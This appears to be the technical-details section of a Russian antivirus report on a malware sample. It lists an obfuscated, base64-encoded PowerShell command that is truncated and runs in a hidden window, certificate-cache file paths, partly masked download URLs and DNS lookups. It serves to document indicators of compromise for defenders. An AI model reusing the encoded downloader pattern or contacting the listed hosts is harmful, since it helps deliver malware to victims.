Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABNAEoAUABXAEsAdQBvAG0APQAnAEEAVABKAEsATwBmAG8AYwAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAYwBVAHIAYABJAGAAVABZAFAAYABSAG8AVABvAGMATwBsACIAIAA9AC...
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
- http://li###ub.shop/sites/XVwCDK/
- http://va####tinchap5s.com/vayvon5s.com/bUl0gxm408039/
- DNS ASK cr###ior.com
- DNS ASK bi####ucphat.com
- DNS ASK to##o.shop
- DNS ASK li###ub.shop
- DNS ASK va####tinchap5s.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABNAEoAUABXAEsAdQBvAG0APQAnAEEAVABKAEsATwBmAG8AYwAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAYwBVAHIAYABJAGAAVABZAFAAYABSAG8AVABvAGMATwBsACIAIAA9AC...' (со скрытым окном)